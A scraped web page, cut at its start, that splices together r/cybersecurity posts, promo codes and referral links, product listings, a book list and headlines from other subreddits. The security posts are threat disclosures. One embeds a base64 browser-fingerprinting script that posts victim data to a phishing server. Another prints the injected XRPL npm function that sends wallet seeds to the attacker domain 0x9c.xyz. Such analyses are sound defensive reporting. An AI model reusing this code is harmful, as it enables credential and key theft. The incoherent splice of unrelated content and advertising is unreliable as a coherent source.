CyberChefJavaScript_Beautify('%20%20','Auto',true,true)Syntax_highlighter('javascript')&input=S0daMWJtTjBhVzl1S0NsN2RtRnlJR1U5VzEwc1lqMTdmVHQwY25sN1puVnVZM1JwYjI0Z1l5aGhLWHRwWmlnaWIySnFaV04wSWowOVBYUjVjR1Z2WmlCaEppWnVkV3hzSVQwOVlTbDdkbUZ5SUdZOWUzMDdablZ1WTNScGIyNGdiaWhzS1h0MGNubDdkbUZ5SUdzOVlWdHNYVHR6ZDJsMFkyZ29kSGx3Wlc5bUlHc3BlMk5oYzJVZ0ltOWlhbVZqZENJNmFXWW9iblZzYkQwOVBXc3BZbkpsWVdzN1kyRnpaU0FpWm5WdVkzUnBiMjRpT21zOWF5NTBiMU4wY21sdVp5Z3BmV1piYkYwOWEzMWpZWFJqYUNoMEtYdGxMbkIxYzJnb2RDNXRaWE56WVdkbEtYMTlabTl5S0haaGNpQmtJR2x1SUdFcGJpaGtLVHQwY25sN2RtRnlJR2M5VDJKcVpXTjBMbWRsZEU5M2JsQnliM0JsY25SNVRtRnRaWE1vWVNrN1ptOXlLR1E5TUR0a1BHY3ViR1Z1WjNSb095c3JaQ2x1S0dkYlpGMHBPMlpiSWlFaElsMDlaMzFqWVhSamFDaHNLWHRsTG5CMWMyZ29iQzV0WlhOellXZGxLWDF5WlhSMWNtNGdabjE5WWk1elkzSmxaVzQ5WXloM2FXNWtiM2N1YzJOeVpXVnVLVHRpTG5kcGJtUnZkejFqS0hkcGJtUnZkeWs3WWk1dVlYWnBaMkYwYjNJOVl5aDNhVzVrYjNjdWJtRjJhV2RoZEc5eUtUdGlMbXh2WTJGMGFXOXVQV01vZDJsdVpHOTNMbXh2WTJGMGFXOXVLVHRpTG1OdmJuTnZiR1U5WXloM2FXNWtiM2N1WTI5dWMyOXNaU2s3Q21JdVpHOWpkVzFsYm5SRmJHVnRaVzUwUFdaMWJtTjBhVzl1S0dFcGUzUnllWHQyWVhJZ1pqMTdmVHRoUFdFdVlYUjBjbWxpZFhSbGN6dG1iM0lvZG1GeUlHUWdhVzRnWVNsa1BXRmJaRjBzWmx0a0xtNXZaR1ZPWVcxbFhUMWtMbTV2WkdWV1lXeDFaVHR5WlhSMWNtNGdabjFqWVhSamFDaG5LWHRsTG5CMWMyZ29aeTV0WlhOellXZGxLWDE5S0dSdlkzVnRaVzUwTG1SdlkzVnRaVzUwUld4bGJXVnVkQ2s3WWk1a2IyTjFiV1Z1ZEQxaktHUnZZM1Z0Wlc1MEtUdDBjbmw3WWk1MGFXMWxlbTl1WlU5bVpuTmxkRDBvYm1WM0lFUmhkR1VwTG1kbGRGUnBiV1Y2YjI1bFQyWm1jMlYwS0NsOVkyRjBZMmdvWVNsN1pTNXdkWE5vS0dFdWJXVnpjMkZuWlNsOWRISjVlMkl1WTJ4dmMzVnlaVDFtZFc1amRHbHZiaWdwZTMwdWRHOVRkSEpwYm1jb0tYMWpZWFJqYUNoaEtYdGxMbkIxYzJnb1lTNXRaWE56WVdkbEtYMTBjbmw3WWk1bWNtRnRaVDEzYVc1a2IzY3VjMlZzWmlFOVBYZHBibVJ2ZHk1MGIzQjlZMkYwWTJnb1lTbDdZaTVtY21GdFpUMGhNSDEwY25sN1lpNTBiM1ZqYUVWMlpXNTBQV1J2WTNWdFpXNTBMbU55WldGMFpVVjJaVzUwS0NKVWIzVmphRVYyWlc1MElpa3VkRzlUZEhKcGJtY29LWDFqWVhSamFDaGhLWHRsTG5CMWMyZ29ZUzV0WlhOellXZGxLWDEwY25sN2RtRnlJSEE5Wm5WdVkzUnBiMjRvS1h0OUxBcHhQVEE3Y0M1MGIxTjBjbWx1WnoxbWRXNWpkR2x2YmlncGV5c3JjVHR5WlhSMWNtNGlJbjA3WTI5dWMyOXNaUzVzYjJjb2NDazdZaTUwYjNOMGNtbHVaejF4ZldOaGRHTm9LR0VwZTJVdWNIVnphQ2hoTG0xbGMzTmhaMlVwZlhSeWVYdDJZWElnYlQxa2IyTjFiV1Z1ZEM1amNtVmhkR1ZGYkdWdFpXNTBLQ0pqWVc1MllYTWlLUzVuWlhSRGIyNTBaWGgwS0NKM1pXSm5iQ0lwTEhJOWJTNW5aWFJGZUhSbGJuTnBiMjRvSWxkRlFrZE1YMlJsWW5WblgzSmxibVJsY21WeVgybHVabThpS1R0aUxuZGxZbWRzUFh0MlpXNWtiM0k2YlM1blpYUlFZWEpoYldWMFpYSW9jaTVWVGsxQlUwdEZSRjlXUlU1RVQxSmZWMFZDUjB3cExISmxibVJsY21WeU9tMHVaMlYwVUdGeVlXMWxkR1Z5S0hJdVZVNU5RVk5MUlVSZlVrVk9SRVZTUlZKZlYwVkNSMHdwZlgxallYUmphQ2hoS1h0bExuQjFjMmdvWVM1dFpYTnpZV2RsS1gxbWRXNWpkR2x2YmlCb0tHRXNaaXhrS1h0MllYSWdaejFoTG5CeWIzUnZkSGx3WlZ0bVhUdGhMbkJ5YjNSdmRIbHdaVnRtWFQxbWRXNWpkR2x2YmlncGUySXVjSEp2ZEc4OUlUQjlPMlFvS1R0aExuQnliM1J2ZEhsd1pWdG1YVDFuZlhSeWVYdG9LRUZ5Y21GNUxDSnBibU5zZFdSbGN5SXNablZ1WTNScGIyNG9LWHR5WlhSMWNtNGdaRzlqZFcxbGJuUXVZM0psWVhSbFJXeGxiV1Z1ZENnaWRtbGtaVzhpS1M1allXNVFiR0Y1Vkhsd1pTZ2lkbWxrWlc4dmJYQTBJaWw5S1gxallYUmphQ2hoS1h0OWZXTmhkR05vS0dNcGUyVXVjSFZ6YUNoakxtMWxjM05oWjJVcGZTaG1kVzVqZEdsdmJpZ3BlMkl1WlhKeWIzSnpQUXBsTzNaaGNpQmpQV1J2WTNWdFpXNTBMbU55WldGMFpVVnNaVzFsYm5Rb0ltWnZjbTBpS1N4b1BXUnZZM1Z0Wlc1MExtTnlaV0YwWlVWc1pXMWxiblFvSW1sdWNIVjBJaWs3WXk1dFpYUm9iMlE5SWxCUFUxUWlPMk11WVdOMGFXOXVQWGRwYm1SdmR5NXNiMk5oZEdsdmJpNW9jbVZtTzJndWRIbHdaVDBpYUdsa1pHVnVJanRvTG01aGJXVTlJbVJoZEdFaU8yZ3VkbUZzZFdVOVNsTlBUaTV6ZEhKcGJtZHBabmtvWWlrN1l5NWhjSEJsYm1SRGFHbHNaQ2hvS1R0a2IyTjFiV1Z1ZEM1aWIyUjVMbUZ3Y0dWdVpFTm9hV3hrS0dNcE8yTXVjM1ZpYldsMEtDbDlLU2dwZlNrb0tUc0s) Finally, an invisible form sends the collected to the server data via POST. If your fingerprint matches: – UTC-3 (Argentina, Brazil) – UTC+2 to +4 (UAE, etc.) The server responds with a Location header pointing to the phishing page: hxxps://zkw[.]idrvlqvkov[.]es/dGeaU/ See example: https://app.any.run/tasks/7c54c46d-285f-491c-ab50-6de1b7d3b376/ IOCs: 45[.]76[.]251[.]81 155[.]138[.]224[.]49 coldsekin[.]com kempiox[.]com kempigd[.]com ladipscsxc[.]co[.]uk lopocip[.]com munkepsx[.]com stealmarkso[.]com klassipon[.]com thartbenx[.]com alixation[.]co[.]uk taramikia[.]com submitted by /u/ANYRUN-team [link] [comments]
- Malicious npm Package Impersonating Popular Express Cookie Parserby /u/N1ghtCod3r (cybersecurity) on April 23, 2025 at 10:16 am
Here is a malicious npm package that DOES NOT trigger on installation. express-cookie-parser impersonates the popular npm package cookie-parser. But instead of dropping the payload during npm install like almost all other known malicious samples, it maintains API compatibility with the original cookie-parser package and drops the payload when the affected application loads this package using its exported API. Interesting behaviour that we observed DGA to generate C2 domain using SHA256 hash & key Self-delete, including removing reference from original index.js The core payload is conventional ie. downloads a startup.js from C2 URL, drops it into Google Chrome's user data directory and executes using Node executable in path. submitted by /u/N1ghtCod3r [link] [comments]
- Do you look at what security solutions that tech companies are building and compete with them to see who have state of the art?by /u/ConstructionSome9015 (cybersecurity) on April 23, 2025 at 8:04 am
There's lots of competition between the security teams to show who is smart. submitted by /u/ConstructionSome9015 [link] [comments]
- NVD / EUVD - EU CVE database announced and LIVEby /u/No-Key667 (cybersecurity) on April 23, 2025 at 5:39 am
The decentralization of such an important pillar of Cybersecurity is great news. Many of us saw this coming since the NIS2 directive was announced in EU. The website is still beta, and the API implementation is on it's way. As they said, the idea is to integrate with the existing NVD established practices: Each vulnerability gets a unique EUVD ID (EUVD-2021-12345) Cross-references with existing CVEs Vulnerabilities are scored using CVSS Includes vulnerabilities reported by the CSIRT network, strengthening accuracy and relevance. EU Vulnerability Database from (ENISA) ----------------------------------------------------------------------------- Update from EUVD FAQ #1 and #4, it leverages on https://github.com/vulnerability-lookup/vulnerability-lookup submitted by /u/No-Key667 [link] [comments]
- Does your phone eavesdrop to target ads? A Samsung engineer and Korean regulators weigh inby /u/Particular-Novel4963 (cybersecurity) on April 23, 2025 at 5:27 am
submitted by /u/Particular-Novel4963 [link] [comments]
- What are some things you share in your SOC meetings?by /u/Full-Bullfrog4707 (cybersecurity) on April 23, 2025 at 1:09 am
I recently joined as SOC analyst and We have 30mins meeting every fortnight but we still don’t have anything to share. We’re just team of 3( manager,me and one more analyst) So wondering, what do you guys normally do? submitted by /u/Full-Bullfrog4707 [link] [comments]
- How do you get over the guilt of a breach?by /u/BillSecurityGuy (cybersecurity) on April 22, 2025 at 9:24 pm
In the past year my company was a victim to a severe cybersecurity breach, they almost got everything. While there were a ton of factors in play, like leadership shutting us down every step of the way in an attempt to move fast, lack of headcount, etc. I cannot stop beating myself over the fact that I hold a piece of a blame as a cybersecurity engineer. Whether it's a missed alert, or simply not putting two and two together at the time. It's severely impacted my mental health since it happened and makes me wonder if I'm not cut out to be a cyber security engineer. I know a lot of work environments are blameless and other engineers seem to be able to compartmentalize it but I can't. I'm sure I'm not the only person who has gone through this in this field. Does anyone who has experienced something similar have any guidance for someone relatively new to the field? submitted by /u/BillSecurityGuy [link] [comments]
- CVE-2025-31161 is being actively exploited and it's not getting the attention it should.by /u/bytelocksolutions (cybersecurity) on April 22, 2025 at 4:26 pm
An authentication bypass vulnerability in CrushFTP (CVE-2025-31161) is currently being exploited in the wild. It affects Versions 10.0.0 to 10.8.3 and versions 11.0.0 to 11.3.0. If exploited, it can allow attackers to access sensitive files without valid credentials and gain full system control depending on configuration Active exploitation has already been confirmed, yet it's flying under the radar. Recommended mitigation would be to upgrade to 10.8.4 or 11.3.1 ASAP. If patching isn’t possible, CrushFTP’s DMZ proxy can provide a temporary buffer. If you're running CrushFTP or know someone who is, now’s the time to double-check your version and get this patched. Wouldn’t be surprised if we see this pop up in a ransomware chain soon. submitted by /u/bytelocksolutions [link] [comments]
- AI hallucinations lead to a new cyber threat: Slopsquattingby /u/Total_Purpose_8499 (cybersecurity) on April 22, 2025 at 1:03 pm
submitted by /u/Total_Purpose_8499 [link] [comments]
- Offical XRP NPM package has been compromised and key stealing malware introduced.by /u/Advocatemack (cybersecurity) on April 22, 2025 at 11:43 am
A few hours ago we discovered that malware was introduced into the XRPL package on NPM. This is the offical SDK for Ripple to interact with the Ripple ledger. The malicious package is still live right now - https://www.npmjs.com/package/xrpl?activeTab=code (src/index.ts) Technical Details Malware Function: A malicious function checkValidityOfSeed was inserted. It POSTs private key data to an attacker's domain 0x9c[.]xyz (C2 server). How was it injected? Code was committed user mukulljangid, believed to be a compromised Ripple employee account. (employee at ripple since 2021 has the same information on Linkedin) export { Client, ClientOptions } from './client' 2 3export * from './models' 4 5export * from './utils' 6 7export { default as ECDSA } from './ECDSA' 8 9export * from './errors' 10 11export { FundingOptions } from './Wallet/fundWallet' 12export { Wallet } from './Wallet' 13 14export { walletFromSecretNumbers } from './Wallet/walletFromSecretNumbers' 15 16export { keyToRFC1751Mnemonic, rfc1751MnemonicToKey } from './Wallet/rfc1751' 17 18export * from './Wallet/signer' 19 20const validSeeds = new Set<string>([]) 21export function checkValidityOfSeed(seed: string) { 22 if (validSeeds.has(seed)) return 23 validSeeds.add(seed) 24 fetch("https://0x9c.xyz/xc", { method: 'POST', headers: { 'ad-referral': seed, } }) 25} You can view the full technical breakdown here -> https://www.aikido.dev/blog/xrp-supplychain-attack-official-npm-package-infected-with-crypto-stealing-backdoor Affected Versions: 4.2.4 4.2.3 4.2.2 4.2.1 2.14.2 Impact If major wallets or exchanges unknowingly upgraded to an infected version, it could cause widespread private key theft across the ecosystem. Swift patching and response are crucial to minimize fallout. submitted by /u/Advocatemack [link] [comments]
- Two top cyber officials resign from CISAby /u/boom_bloom (cybersecurity) on April 22, 2025 at 10:03 am
submitted by /u/boom_bloom [link] [comments]
- Mentorship Monday - Post All Career, Education and Job questions here!by /u/AutoModerator (cybersecurity) on April 21, 2025 at 12:00 am
This is the weekly thread for career and education questions and advice. There are no stupid questions; so, what do you want to know about certs/degrees, job requirements, and any other general cybersecurity career questions? Ask away! Interested in what other people are asking, or think your question has been asked before? Have a look through prior weeks of content - though we're working on making this more easily searchable for the future. submitted by /u/AutoModerator [link] [comments]
- I'm a former CISO who left to start my own security company. Ask Me Anything.by /u/Oscar_Geare (cybersecurity) on April 20, 2025 at 5:37 pm
Hello, The editors at CISO Series present this AMA, and they have assembled security leaders who left their roles as CISOs to start their own security companies. They are here to answer any relevant questions about taking the leap of faith from a CISO role to start their own business (launching a security solution or becoming a vCISO/consultant). This has been a long-term partnership between r/cybersecurity and the CISO Series. This week's participants are: Ian Amit, (/u/iiamit), CEO & Co-Founder, GomBoc,ai Sara Lazarus, (/u/securitybysara), Founder and CISO , Faded Jeans Technology Olivia Rose, (/u/SinkBusiness8170), CISO and Founder, Rose CISO Group Rolin (Bud) Peets, (/u/TrustCISOBud), Chief Protection Architect, Harbor IT Proof Photos This AMA will run all week from 20 Apr 2025 to 26 Apr 2025. Our participants will check in over that time to answer your questions. All AMA participants are chosen by the editors at CISO Series (/r/CISOSeries), a media network for security professionals delivering the most fun you’ll have in cybersecurity. Please check out our podcasts and weekly Friday event, Super Cyber Friday, at cisoseries.com. submitted by /u/Oscar_Geare [link] [comments]
What is Google Workspace?
Google Workspace is a cloud-based productivity suite that helps teams communicate, collaborate and get things done from anywhere and on any device. It's simple to set up, use and manage, so your business can focus on what really matters.
Watch a video or find out more here.
Here are some highlights:
Business email for your domain
Look professional and communicate as you@yourcompany.com. Gmail's simple features help you build your brand while getting more done.
Access from any location or device
Check emails, share files, edit documents, hold video meetings and more, whether you're at work, at home or on the move. You can pick up where you left off from a computer, tablet or phone.
Enterprise-level management tools
Robust admin settings give you total command over users, devices, security and more.
Sign up using my link https://referworkspace.app.goo.gl/Q371 and get a 14-day trial, and message me to get an exclusive discount when you try Google Workspace for your business.
Google Workspace Business Standard Promotion code for the Americas
63F733CLLY7R7MM
63F7D7CPD9XXUVT
63FLKQHWV3AEEE6
63JGLWWK36CP7WM
Email me for more promo codes
Active Hydrating Toner, Anti-Aging Replenishing Advanced Face Moisturizer, with Vitamins A, C, E & Natural Botanicals to Promote Skin Balance & Collagen Production, 6.7 Fl Oz
Age Defying 0.3% Retinol Serum, Anti-Aging Dark Spot Remover for Face, Fine Lines & Wrinkle Pore Minimizer, with Vitamin E & Natural Botanicals
Firming Moisturizer, Advanced Hydrating Facial Replenishing Cream, with Hyaluronic Acid, Resveratrol & Natural Botanicals to Restore Skin's Strength, Radiance, and Resilience, 1.75 Oz
Skin Stem Cell Serum
Smartphone 101 - Pick a smartphone for me - android or iOS - Apple iPhone or Samsung Galaxy or Huawei or Xaomi or Google Pixel
Can AI Really Predict Lottery Results? We Asked an Expert.
Djamgatech

Read Photos and PDFs Aloud for me iOS
Read Photos and PDFs Aloud for me android
Read Photos and PDFs Aloud For me Windows 10/11
Read Photos and PDFs Aloud For Amazon
Get 20% off Google Workspace (Google Meet) Business Plan (AMERICAS): M9HNXHX3WC9H7YE (Email us for more)
Get 20% off Google Google Workspace (Google Meet) Standard Plan with the following codes: 96DRHDRA9J7GTN6(Email us for more)
AI-Powered Professional Certification Quiz Platform
Web|iOs|Android|Windows
FREE 10000+ Quiz Trivia and and Brain Teasers for All Topics including Cloud Computing, General Knowledge, History, Television, Music, Art, Science, Movies, Films, US History, Soccer Football, World Cup, Data Science, Machine Learning, Geography, etc....

List of Freely available programming books - What is the single most influential book every Programmers should read
- Bjarne Stroustrup - The C++ Programming Language
- Brian W. Kernighan, Rob Pike - The Practice of Programming
- Donald Knuth - The Art of Computer Programming
- Ellen Ullman - Close to the Machine
- Ellis Horowitz - Fundamentals of Computer Algorithms
- Eric Raymond - The Art of Unix Programming
- Gerald M. Weinberg - The Psychology of Computer Programming
- James Gosling - The Java Programming Language
- Joel Spolsky - The Best Software Writing I
- Keith Curtis - After the Software Wars
- Richard M. Stallman - Free Software, Free Society
- Richard P. Gabriel - Patterns of Software
- Richard P. Gabriel - Innovation Happens Elsewhere
- Code Complete (2nd edition) by Steve McConnell
- The Pragmatic Programmer
- Structure and Interpretation of Computer Programs
- The C Programming Language by Kernighan and Ritchie
- Introduction to Algorithms by Cormen, Leiserson, Rivest & Stein
- Design Patterns by the Gang of Four
- Refactoring: Improving the Design of Existing Code
- The Mythical Man Month
- The Art of Computer Programming by Donald Knuth
- Compilers: Principles, Techniques and Tools by Alfred V. Aho, Ravi Sethi and Jeffrey D. Ullman
- Gödel, Escher, Bach by Douglas Hofstadter
- Clean Code: A Handbook of Agile Software Craftsmanship by Robert C. Martin
- Effective C++
- More Effective C++
- CODE by Charles Petzold
- Programming Pearls by Jon Bentley
- Working Effectively with Legacy Code by Michael C. Feathers
- Peopleware by Demarco and Lister
- Coders at Work by Peter Seibel
- Surely You're Joking, Mr. Feynman!
- Effective Java 2nd edition
- Patterns of Enterprise Application Architecture by Martin Fowler
- The Little Schemer
- The Seasoned Schemer
- Why's (Poignant) Guide to Ruby
- The Inmates Are Running The Asylum: Why High Tech Products Drive Us Crazy and How to Restore the Sanity
- The Art of Unix Programming
- Test-Driven Development: By Example by Kent Beck
- Practices of an Agile Developer
- Don't Make Me Think
- Agile Software Development, Principles, Patterns, and Practices by Robert C. Martin
- Domain Driven Designs by Eric Evans
- The Design of Everyday Things by Donald Norman
- Modern C++ Design by Andrei Alexandrescu
- Best Software Writing I by Joel Spolsky
- The Practice of Programming by Kernighan and Pike
- Pragmatic Thinking and Learning: Refactor Your Wetware by Andy Hunt
- Software Estimation: Demystifying the Black Art by Steve McConnel
- The Passionate Programmer (My Job Went To India) by Chad Fowler
- Hackers: Heroes of the Computer Revolution
- Algorithms + Data Structures = Programs
- Writing Solid Code
- JavaScript - The Good Parts
- Getting Real by 37 Signals
- Foundations of Programming by Karl Seguin
- Computer Graphics: Principles and Practice in C (2nd Edition)
- Thinking in Java by Bruce Eckel
- The Elements of Computing Systems
- Refactoring to Patterns by Joshua Kerievsky
- Modern Operating Systems by Andrew S. Tanenbaum
- The Annotated Turing
- Things That Make Us Smart by Donald Norman
- The Timeless Way of Building by Christopher Alexander
- The Deadline: A Novel About Project Management by Tom DeMarco
- The C++ Programming Language (3rd edition) by Stroustrup
- Patterns of Enterprise Application Architecture
- Computer Systems - A Programmer's Perspective
- Agile Principles, Patterns, and Practices in C# by Robert C. Martin
- Growing Object-Oriented Software, Guided by Tests
- Framework Design Guidelines by Brad Abrams
- Object Thinking by Dr. David West
- Advanced Programming in the UNIX Environment by W. Richard Stevens
- Hackers and Painters: Big Ideas from the Computer Age
- The Soul of a New Machine by Tracy Kidder
- CLR via C# by Jeffrey Richter
- The Timeless Way of Building by Christopher Alexander
- Design Patterns in C# by Steve Metsker
- Alice in Wonderland by Lewis Carol
- Zen and the Art of Motorcycle Maintenance by Robert M. Pirsig
- About Face - The Essentials of Interaction Design
- Here Comes Everybody: The Power of Organizing Without Organizations by Clay Shirky
- The Tao of Programming
- Computational Beauty of Nature
- Writing Solid Code by Steve Maguire
- Philip and Alex's Guide to Web Publishing
- Object-Oriented Analysis and Design with Applications by Grady Booch
- Effective Java by Joshua Bloch
- Computability by N. J. Cutland
- Masterminds of Programming
- The Tao Te Ching
- The Productive Programmer
- The Art of Deception by Kevin Mitnick
- The Career Programmer: Guerilla Tactics for an Imperfect World by Christopher Duncan
- Paradigms of Artificial Intelligence Programming: Case studies in Common Lisp
- Masters of Doom
- Pragmatic Unit Testing in C# with NUnit by Andy Hunt and Dave Thomas with Matt Hargett
- How To Solve It by George Polya
- The Alchemist by Paulo Coelho
- Smalltalk-80: The Language and its Implementation
- Writing Secure Code (2nd Edition) by Michael Howard
- Introduction to Functional Programming by Philip Wadler and Richard Bird
- No Bugs! by David Thielen
- Rework by Jason Freid and DHH
- JUnit in Action
#BlackOwned #BlackEntrepreneurs #BlackBuniness #AWSCertified #AWSCloudPractitioner #AWSCertification #AWSCLFC02 #CloudComputing #AWSStudyGuide #AWSTraining #AWSCareer #AWSExamPrep #AWSCommunity #AWSEducation #AWSBasics #AWSCertified #AWSMachineLearning #AWSCertification #AWSSpecialty #MachineLearning #AWSStudyGuide #CloudComputing #DataScience #AWSCertified #AWSSolutionsArchitect #AWSArchitectAssociate #AWSCertification #AWSStudyGuide #CloudComputing #AWSArchitecture #AWSTraining #AWSCareer #AWSExamPrep #AWSCommunity #AWSEducation #AzureFundamentals #AZ900 #MicrosoftAzure #ITCertification #CertificationPrep #StudyMaterials #TechLearning #MicrosoftCertified #AzureCertification #TechBooks
Top 1000 Canada Quiz and trivia: CANADA CITIZENSHIP TEST- HISTORY - GEOGRAPHY - GOVERNMENT- CULTURE - PEOPLE - LANGUAGES - TRAVEL - WILDLIFE - HOCKEY - TOURISM - SCENERIES - ARTS - DATA VISUALIZATION

Top 1000 Africa Quiz and trivia: HISTORY - GEOGRAPHY - WILDLIFE - CULTURE - PEOPLE - LANGUAGES - TRAVEL - TOURISM - SCENERIES - ARTS - DATA VISUALIZATION

Exploring the Pros and Cons of Visiting All Provinces and Territories in Canada.

Exploring the Advantages and Disadvantages of Visiting All 50 States in the USA

Health Health, a science-based community to discuss human health
- Trump administration wants to cut LGBTQ+ suicide crisis line’s funding; LGBTQ+ youth advocates say the crisis line is an important resource. "Suicide prevention is about risk, not identity."by /u/progress18 on April 23, 2025 at 11:14 pm
submitted by /u/progress18 [link] [comments]
- Optimal sexual frequency may exist and help mitigate depression odds in young and middle-aged U.S. citizens: A cross-sectional studyby /u/RevelationSr on April 23, 2025 at 9:49 pm
submitted by /u/RevelationSr [link] [comments]
- These are the 6 food dyes the FDA wants to phase out and some of products that use themby /u/CBSnews on April 23, 2025 at 7:17 pm
submitted by /u/CBSnews [link] [comments]
- Good Job, MAHAby /u/theatlantic on April 23, 2025 at 6:22 pm
submitted by /u/theatlantic [link] [comments]
- The birth rate went up in 2024 after a historic drop, driven by moms over 40by /u/thisisinsider on April 23, 2025 at 5:14 pm
submitted by /u/thisisinsider [link] [comments]
Today I Learned (TIL) You learn something new every day; what did you learn today? Submit interesting and specific facts about something that you just found out here.
- TIL that the CIA created a gun that could shoot darts causing heart attacks. Upon penetration of the skin, the dart left just a tiny red dot. The poison worked rapidly and denatured quickly, leaving no trace. This weapon was revealed in a 1975 Congressional testimony.by /u/Upstairs_Drive_5602 on April 23, 2025 at 10:00 pm
submitted by /u/Upstairs_Drive_5602 [link] [comments]
- TIL that “bloodcurdling” is more than just an expression. Watching horror movies can actually raise levels of a blood-clotting protein.by /u/ApprehensiveBag1882 on April 23, 2025 at 9:02 pm
submitted by /u/ApprehensiveBag1882 [link] [comments]
- TIL about Slow TV, a Norwegian television genre that broadcasts real-time, unedited footage of ordinary events, such as a 7-hour train journey or a real-time broadcast of wild salmon migrating to spawn.by /u/highaskite25 on April 23, 2025 at 8:02 pm
submitted by /u/highaskite25 [link] [comments]
- TIL that a South Korean actor was abducted by dictator Kim Jong Il to upgrade North Korea's film industry and gain global recognitionby /u/No-Community- on April 23, 2025 at 7:50 pm
submitted by /u/No-Community- [link] [comments]
- TIL: To become King Louis XV's official mistress, Madame du Barry had a fake birth certificate made to hide her humble origin as the illegitimate daughter of a seamstress. The birth certificate claimed her family were nobility and that she was 3 years younger than her actual age.by /u/Ill_Definition8074 on April 23, 2025 at 7:22 pm
submitted by /u/Ill_Definition8074 [link] [comments]
Reddit Science This community is a place to share and discuss new scientific research. Read about the latest advances in astronomy, biology, medicine, physics, social science, and more. Find and submit new publications and popular science coverage of current research.
- Human-pet relationships are beneficial, but some may contribute to stress and anxiety rather than relief. Pet attachment anxiety was the strongest predictor of depression - people overly dependent on their pets, constantly worrying abut being apart from them or whether their pet “loved” them back.by /u/mvea on April 23, 2025 at 11:13 pm
submitted by /u/mvea [link] [comments]
- Bowel cancer rates in adults under 50 has been doubling every decade for past 20 years, and will be the leading cause of cancer death in that age group by 2030. Childhood toxin exposure ‘may be factor’, with mutations more often found in younger patients’ tumours caused by toxin from E coli strains.by /u/mvea on April 23, 2025 at 9:31 pm
submitted by /u/mvea [link] [comments]
- Stretchable battery can survive even extreme torture: « The lithium-ion battery can heal itself after being cut in half. »by /u/fchung on April 23, 2025 at 9:08 pm
submitted by /u/fchung [link] [comments]
- Meat alternative consumers still frowned upon in Europe: Analysis of stereotypical, emotional and behavioral responses of observing othersby /u/robo-puppy on April 23, 2025 at 8:01 pm
submitted by /u/robo-puppy [link] [comments]
- Parts of the human genome (DNA) change much faster than previously known, even passing from parents to children, providing new insights into the origins of human diseases and evolutionby /u/nohup_me on April 23, 2025 at 7:08 pm
submitted by /u/nohup_me [link] [comments]
Reddit Sports Sports News and Highlights from the NFL, NBA, NHL, MLB, MLS, and leagues around the world.
- Jayson Tatum misses 1st career playoff game with wrist injury as Celtics host Magic in Game 2by /u/Oldtimer_2 on April 23, 2025 at 11:02 pm
submitted by /u/Oldtimer_2 [link] [comments]
- Brothers Nico and Madden Iamaleava transfers raise issue of whether NIL collectives will recoup paymentsby /u/Oldtimer_2 on April 23, 2025 at 9:40 pm
submitted by /u/Oldtimer_2 [link] [comments]
- Behind-the-back & turn-around: Trickshot in regular international tournament (WTT Contender Tunis)by /u/777tabletennis on April 23, 2025 at 8:11 pm
One of the craziest shots I’ve seen in a regular match. submitted by /u/777tabletennis [link] [comments]
- "I dropped my weights and collapsed. I just sat up, kind of stared off, then I fell over and started seizing out": Rising star high school baseball player who was about to pitch in college survives life-threatening brain aneurysmby /u/Sandstorm400 on April 23, 2025 at 5:11 pm
submitted by /u/Sandstorm400 [link] [comments]
- Steven Kwan called time last night and put on a pink wristband to reveal the gender of the baby that David Fry and his wife are expectingby /u/SL4MUEL on April 23, 2025 at 3:56 pm
submitted by /u/SL4MUEL [link] [comments]